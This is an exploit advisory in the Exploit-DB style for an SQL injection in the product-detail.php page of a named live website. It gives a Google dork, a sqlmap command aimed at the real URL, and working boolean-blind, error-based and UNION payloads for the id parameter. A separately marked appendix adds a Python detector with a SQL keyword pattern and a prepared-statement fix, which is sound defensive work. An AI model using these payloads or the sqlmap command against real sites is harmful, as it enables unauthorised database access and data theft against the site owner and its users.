****************************
#Exploit Title: TEJASVANI - SQL Injection vulnerability
#Date: 2020-08-31
#Exploit Author: Mahdi Karimi
#Vendor Homepage: http://tejasvani.online
#Google Dork: item.php?id=
#Tested On: Windows 10
sqlmap:
sqlmap -u "http://tejasvani.online/product-detail.php?id=282&sid=27" --dbs
Testing Method:
- boolean-based blind
- UNION query
- error-based
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (5027=5027) THEN 5027 ELSE 5027*(SELECT 5027 FROM INFORMATION_SCHEMA.PLUGINS) END))&sid=27

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=282 AND (SELECT 5420 FROM(SELECT COUNT(*),CONCAT(0x7170767071,(SELECT (ELT(5420=5420,1))),0x716b787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&sid=27

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=282 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767071,0x6f66556b52525170727a70636c7648516865634575754e4e655879434b4f50466c4565786a6e7956,0x716b787671),NULL-- cANE&sid=27
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************
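
Defensive check, added here as an example and not part of the original advisory: all three payload types above place non-numeric content in the id parameter, so a strict integer check on id and sid in requests or access-log paths flags each of them. The names check_request, build, NUMERIC_PARAMS, DIGITS, SQL_HINTS and SAMPLES are hypothetical, the sample requests are constructed, and treating both parameters as numeric is an assumption based on the tested URL.

```python
import re
from urllib.parse import urlencode, urlsplit, parse_qs

# Assumption: both parameters are numeric keys, as in the tested URL (id=282&sid=27).
NUMERIC_PARAMS = ("id", "sid")
DIGITS = re.compile(r"[0-9]{1,10}")
# SQL tokens that occur in the three payload types reported above.
SQL_HINTS = re.compile(r"\b(select|union|information_schema|concat|case\s+when)\b", re.I)

def check_request(url):
    """Return (param, reason) findings for one request URL or log path."""
    findings = []
    # parse_qs percent-decodes values and keeps repeated parameters,
    # so encoded payloads and duplicated id= values are all inspected.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if DIGITS.fullmatch(value):
                continue
            reason = "sql-keywords" if SQL_HINTS.search(value) else "non-numeric"
            findings.append((name, reason))
    return findings

def build(id_value, sid_value="27"):
    """Build a constructed sample request path for product-detail.php."""
    return "/product-detail.php?" + urlencode({"id": id_value, "sid": sid_value})

# Constructed samples; the payloads are shortened forms of the ones listed above.
SAMPLES = {
    "benign": build("282"),
    "boolean": build("(SELECT (CASE WHEN (5027=5027) THEN 5027 ELSE 5027 END))"),
    "error": build("282 AND (SELECT 5420 FROM(SELECT COUNT(*) FROM INFORMATION_SCHEMA.PLUGINS)a)"),
    "union": build("282 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cANE"),
    "garbage": build("282abc"),
}

if __name__ == "__main__":
    for label, url in SAMPLES.items():
        print(label, check_request(url))
```

This check is defense in depth and a detection aid; the fix for the injection itself is to bind id and sid as integer parameters in a prepared statement instead of concatenating them into the query.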